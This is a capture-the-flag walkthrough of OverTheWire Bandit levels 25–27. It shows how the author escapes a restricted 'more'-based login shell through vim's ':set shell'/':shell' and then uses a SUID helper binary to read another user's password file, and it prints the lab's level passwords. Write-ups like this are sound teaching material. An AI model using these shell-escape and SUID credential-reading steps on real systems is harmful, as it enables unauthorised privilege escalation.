Level 25 –> 26
Level credentials
- username : bandit25
- password : p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Level goal
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
Level solution
As described, this level is pretty much free, an ssh key private key is in the current directory, let’s copy it to our local machine and use it to access the next level.
1
2
bandit25@bandit:~$ ls
bandit26.sshkey
1
2
3
# in our host machine
┌──(yariss㉿Kali-VM)-[~/boxes/bandit]
└─$ scp -P 2220 bandit25@bandit.labs.overthewire.org:/home/bandit25/bandit26.sshkey .
1
2
3
┌──(yariss㉿Kali-VM)-[~/boxes/bandit]
└─$ ls -l bandit26.sshkey
-rw------- 1 yariss yariss 1679 Apr 27 23:31 bandit26.sshkey
Now let’s connect to bandit26 !
1
2
┌──(yariss㉿Kali-VM)-[~/boxes/bandit]
└─$ ssh -i bandit26.sshkey bandit26@bandit.labs.overthewire.org -p 2220
That’s odd, we can’t connect ! We get logged out each time… My first thought is bashrc being modified.
But, the challenge description says that bandit26 is using another shell !
Let’s connect using bandit25 credentials and see what the shell is going on!
1
2
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
Hmmm, its seems like a custom shell, let’s read its content.
1
2
3
4
5
6
7
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0
It seems like the shell executes more on ~/text.txt and when it finished, it exits. The exit is the reason we get disconnected.
1
2
bandit25@bandit:~$ ls -l /home/bandit26/text.txt
-rw-r----- 1 bandit26 bandit26 258 Apr 23 18:04 /home/bandit26/text.txt
Our text has 258 characters, so what I’m thinking here is, when we log in with bandit26, we must prevent more from reading all of text.txt content, that way exit doesn’t get triggered.
It worked, we are not being kicked ! Let’s change our shell back to bash. but how are we going to do that?
We can access vim inside more by just typing v, and then inside vim we can execute commands.
Note : hit
ESCto switch to the command mode
1
2
:set shell=/bin/bash
:shell
This sets our shell to bash, instead of $SHELL which is not what we want in our case.
:shell allows us to open a new bash shell inside Vim, which allows us to execute bash commands and return to Vim when we’re finished.
Here we go, we escaped the broken shell !
1
2
3
:shell
bandit26@bandit:~$ ls
bandit27-do text.txt
Level 26 –> 27
Level credentials
- username : bandit26
- password : SSH KEY from the previous level
Level goal
Good job getting a shell! Now hurry and grab the password for bandit27!
Level solution
After escaping the shell in the previous level, we are now presented with a SUID binary, let’s run it.
1
2
3
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id
We have exploited something similar to this in the previous levels, we can just display the target’s password using this binary.
1
2
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
And voila !
We got our password 😃
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS